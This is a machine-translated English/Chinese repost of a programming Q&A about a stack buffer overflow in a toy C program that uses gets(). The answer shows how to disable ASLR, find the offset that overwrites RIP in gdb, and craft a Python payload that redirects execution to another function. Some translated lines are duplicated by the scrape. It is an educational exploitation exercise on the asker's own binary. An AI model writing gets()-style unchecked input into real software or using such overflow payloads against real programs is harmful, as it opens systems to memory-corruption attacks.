即使禁用了 ASLR 和堆栈编译器保护器,Linux 上的 ROP 也会失败
[英]ROP faild on linux even when ASLR and stack compiler protector are disabled
问题描述
I tern off the ASLR and tern of the gcc stack protector.
我关闭了 gcc 堆栈保护器的 ASLR 和 tern。
And I wrote C vulnerable code and I tried to overflow the buffer so I check how many character need for the crash.我编写了 C 易受攻击的代码,并试图溢出缓冲区,因此我检查了崩溃需要多少字符。 And I tried to change the return address , to another function but I got a message:我试图将返回地址更改为另一个函数,但我收到一条消息:
Segmentation fault (core dumped)
This is my C code:这是我的 C 代码:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void sss()
{
printf("good by");
}
void scriptpy(){
printf("hello world\n");
}
int main(int argc , char** argv)
{
char buf[4];
gets(buf);
return 0;
}
I found the address of the "sss" function and i tried to insert the hex value .我找到了“sss”函数的地址,并尝试插入十六进制值。
This is my address:这是我的地址:
(gdb) disas sss
Dump of assembler code for function sss:
0x00000000000006ca <+0>: push %rbp
To edit the return address i insert:要编辑我插入的返回地址:
printf "AAAABBBBB/xe2/x06/x00/x00/x00/x00/x00/x00" | ./cTutorial
1 个解决方案
解决方案1
3 2020-11-02 12:52:44
Let's suppose that the binary is compiled with the flag -fno-stack-protector and the ASLR is disabled echo 0 | sudo tee /proc/sys/kernel/randomize_va_space假设二进制文件是使用标志-fno-stack-protector编译的,并且 ASLR 已禁用echo 0 | sudo tee /proc/sys/kernel/randomize_va_space echo 0 | sudo tee /proc/sys/kernel/randomize_va_space . echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 。
Find the crash:找到崩溃:
The program start crashing with payload of 12 characters:程序开始崩溃,有效载荷为 12 个字符:
$ python3 -c "print('A' * 12)" | ./cTutorial
Segmentation fault (core dumped)
Controlling RIP控制 RIP
Using GDB to find the offset that overwrite RIP, we can find that the first byte of RIP can be overwritten with 0x41 ('A') with a payload of 13 characters:使用GDB查找覆盖RIP的偏移量,我们可以发现RIP的第一个字节可以用13个字符的有效载荷0x41('A')覆盖:
$ gdb -q cTutorial
Reading symbols from cTutorial...
(No debugging symbols found in cTutorial)
(gdb) r <<<$(python3 -c "print('A' * 13)")
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7de0041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
Note that RIP is overwritten with 0041 where 00 is the null characters terminating the string.请注意,RIP 被0041覆盖,其中00是终止字符串的空字符。
To control all bytes of RIP:要控制 RIP 的所有字节:
(gdb) r <<<$(python3 -c "print('A' * 18)")
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
Let's suppose that the function sss is located at the address 0x0000555555555189 .假设函数sss位于地址0x0000555555555189 。
The final payload is:最终的有效载荷是:
(gdb) b sss
(gdb) r <<<$(python3 -c "print('A' * 11 + '\x89\x51\x55\x55\x55\x55')")
breakpoint 1, 0x0000555555555189 in sss ()
Where 11 = 18 - (len('\\x89\\x51\\x55\\x55\\x55\\x55') + 1)其中 11 = 18 - (len('\\x89\\x51\\x55\\x55\\x55\\x55') + 1)
+1 for the null byte +1 为空字节
The jump to the function sss is taken.跳转到函数sss 。 The program will crash after the jump to the function sss as the stack will be corrupted.跳转到函数sss后程序将崩溃,因为堆栈将被破坏。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.